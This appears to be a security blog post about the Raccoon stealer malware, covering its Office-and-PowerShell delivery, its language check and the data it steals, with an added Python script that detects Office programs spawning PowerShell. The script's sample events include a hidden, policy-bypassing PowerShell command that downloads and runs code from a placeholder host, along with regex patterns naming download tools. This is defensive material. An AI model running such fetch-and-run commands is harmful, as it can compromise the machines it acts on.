Raccoon Malware

Raccoon is a malware-as-a-service (MaaS) spyware offered through a number of dark web forums. Researchers first spotted Raccoon in April 2019. The malware, written in C++, can be delivered through several methods. It has quickly become one of the most observed malware families thanks to a combination of low cost, ease of use, and 24/7 support.

As with most MaaS tools, Raccoon can be delivered through a number of vectors chosen by its operators. At the time of publication, it had been distributed via spam and phishing campaigns, exploit kits, compromised third-party applications, and supply chain compromises. Raccoon is supplied to operators as a malicious Microsoft Office document containing a number of PowerShell scripts which, when the document is opened, connect to a command-and-control (C2) server and download the Raccoon payload.
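The delivery chain described above (an Office document whose embedded PowerShell reaches out to a C2 server) leaves a distinctive trace on the endpoint: an Office application becomes the parent of a PowerShell process, often with download, hidden-window or encoded-command switches on the command line. The following script is an added detection example, not code from the original post or from any Raccoon analysis; the process-creation events it scans are constructed inline and only borrow Sysmon Event ID 1 field names (ParentImage, Image, CommandLine). The command-line patterns are generic PowerShell-staging indicators and are an assumption, not Raccoon-specific signatures.

```python
"""Flag Office applications spawning PowerShell in process-creation events.

Added illustration for this post; the events below are constructed for
the example and do not come from a real host.
"""
import re
from dataclasses import dataclass, field

# Office hosts that should rarely, if ever, launch a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Generic staging indicators (assumed, not taken from the post). Each match
# adds a reason to the finding so an analyst can see why it was raised.
SUSPICIOUS_CMD = [
    (re.compile(r"-e(nc(odedcommand)?)?\b", re.I), "encoded command"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b", re.I), "remote download"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"bypass", re.I), "execution policy bypass"),
    (re.compile(r"https?://", re.I), "URL in command line"),
]


@dataclass
class Finding:
    record_id: str
    parent: str
    child: str
    reasons: list = field(default_factory=list)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_event(ev):
    """Return a Finding when an Office parent launches PowerShell, else None."""
    parent = basename(ev.get("ParentImage", ""))
    child = basename(ev.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    reasons = ["Office process spawned a script host"]
    cmd = ev.get("CommandLine", "")
    for pattern, label in SUSPICIOUS_CMD:
        if pattern.search(cmd):
            reasons.append(label)
    return Finding(ev.get("EventRecordID", "?"), parent, child, reasons)


def scan(events):
    """Run analyze_event over a sequence of events and keep the findings."""
    return [f for f in map(analyze_event, events) if f is not None]


# Constructed sample events; the URL uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"EventRecordID": "1001",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage')\""},
    {"EventRecordID": "1002",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"EventRecordID": "1003",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"EventRecordID": "1004",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -enc SQBFAFgA"},
]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"record {f.record_id}: {f.parent} -> {f.child}: {', '.join(f.reasons)}")
```

Only the two Office-parented PowerShell launches are reported; the explorer.exe-launched script and the Excel-to-cmd.exe case are left alone. In a real deployment the parent/child rule is the high-confidence signal, and the command-line labels serve as triage context rather than as a requirement for alerting.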

Once installed, Raccoon first checks the system language and terminates itself if Russian, Ukrainian, Belarusian, Kazakh, Kyrgyz, Armenian, Tajik, or Uzbek is detected. It then collects system and user information and sends it to a separate C2 server before awaiting further commands. Raccoon can extract information from cache files, web browsers, mail clients, and cryptocurrency wallets, as well as capture audio and video from the webcam.

You can read more on this malware here:

Raccoon Stealer – Indicators of Compromise

https://www.cybereason.com/hubfs/Indicators%20of%20Compromise/Raccoon%20-%20Indicators%20of%20Compromise.pdf

Jason Davies

UK-based technology professional, with an interest in computer security and telecoms.
